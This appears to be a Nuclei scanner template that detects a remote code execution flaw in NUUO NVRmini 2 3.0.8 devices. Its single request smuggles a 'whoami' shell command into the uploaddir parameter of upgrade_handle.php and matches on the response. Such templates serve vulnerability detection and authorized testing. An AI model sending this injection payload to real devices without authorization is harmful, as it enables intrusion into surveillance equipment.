id: nuuo-nvrmini2-upgradehandlephp-rce

info:
  name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
  author: berkdusunur
  severity: critical
  tags: rce
  reference:
    - https://www.exploit-db.com/exploits/45070
    - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
    - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html

requests:
  - method: GET
    path:
      - "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/upload_tmp_dir/"
        part: body

      - type: status
        status:
          - 200